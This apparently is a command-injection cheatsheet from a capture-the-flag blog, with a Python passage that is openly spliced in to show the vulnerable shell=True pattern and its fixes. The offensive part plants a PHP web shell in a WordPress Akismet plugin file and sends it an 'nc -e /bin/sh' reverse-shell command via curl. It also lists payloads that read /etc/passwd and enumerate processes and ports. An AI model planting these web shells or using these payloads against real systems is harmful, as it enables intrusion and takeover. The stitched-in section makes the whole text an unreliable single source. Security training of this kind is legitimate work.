Command Injection cheatsheet

Command injection is a vulnerability that occurs when an application improperly passes user input to a system shell. Attackers can exploit this flaw to execute arbitrary commands on the target system. This often happens due to improper input validation in web applications, shell scripts, or system commands.
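To make the mechanism concrete, here is an added Python example (not code from the original post) that puts the flawed pattern next to its fix. `run_with_shell` builds a command string and hands it to a shell, exactly the mistake described above; `run_without_shell` passes the user value as a single argv element so the shell never parses it; `run_validated` adds an allowlist check in front, which is the right design when the parameter has a known shape such as a hostname. The function names, the `echo` stand-in for the "real" command, and the hostname pattern are all assumptions made for this illustration.

```python
import re
import subprocess

# Assumed shape of the only input this endpoint should accept: a DNS hostname.
# Shell metacharacters (; && || | ` $( and newlines) cannot match this pattern.
HOSTNAME_RE = re.compile(
    r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def run_with_shell(user_input: str) -> str:
    """VULNERABLE: the input is concatenated into a command line that a shell
    interprets, so a ';' in the input ends the intended command and starts
    a new one. 'echo' stands in for whatever program the app really calls."""
    completed = subprocess.run(
        "echo " + user_input,
        shell=True,            # the shell parses ; && || | ` $( ...
        capture_output=True,
        text=True,
    )
    return completed.stdout


def run_without_shell(user_input: str) -> str:
    """FIXED (step 1): argv list, no shell. The whole string becomes one
    argument of echo, so chaining operators are printed literally."""
    completed = subprocess.run(
        ["echo", user_input],  # no shell is involved at all
        capture_output=True,
        text=True,
        check=True,
    )
    return completed.stdout.strip()


def is_safe_hostname(value: str) -> bool:
    """Allowlist check: True only for a plain hostname."""
    return HOSTNAME_RE.fullmatch(value) is not None


def run_validated(user_input: str) -> str:
    """FIXED (step 2): reject anything that is not a hostname before running,
    then still avoid the shell. Defence in depth: even if the called program
    itself had a dangerous option, junk never reaches it."""
    if not is_safe_hostname(user_input):
        raise ValueError("rejected: parameter is not a plain hostname")
    return run_without_shell(user_input)


if __name__ == "__main__":
    # Constructed demonstration input: a benign second command after ';'.
    probe = "example.com; echo INJECTED"
    print("shell=True   ->", repr(run_with_shell(probe)))     # two lines: ';' was obeyed
    print("argv list    ->", repr(run_without_shell(probe)))  # one line: ';' is just text
    try:
        run_validated(probe)
    except ValueError as exc:
        print("allowlist    ->", exc)
    print("allowlist ok ->", run_validated("example.com"))
```

The argv-list form alone stops the operator-chaining shown in this cheatsheet, but the allowlist is what protects you when the invoked program has its own dangerous arguments (for example an option that writes to a file); both layers together are the usual recommendation.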

Alternative Command Injection

Replace vulnerable code with:

```php
<?php echo system($_REQUEST['cmd']); ?>
```

Example usage:

```text
wp-content/plugins/akismet/wrapper.php?cmd=whoami
```

Or via curl:

```bash
curl -X POST http://spectra.htb/pathtoaskismet/wrapper.php -d cmd="nc 127.0.0.1 1337 -e /bin/sh"
```

Linux Command Injection

Basic Enumeration

```bash
; id
; whoami
; uname -a
; ls -la
; cat /etc/passwd
; ps aux
; netstat -tulnp
```

Chaining Commands

```bash
id; ls -la  # Execute id and then list files
whoami && hostname  # Run hostname only if whoami succeeds
ls || echo "Command failed"  # Show message if ls fails
```

This post is licensed under CC BY 4.0 by the author.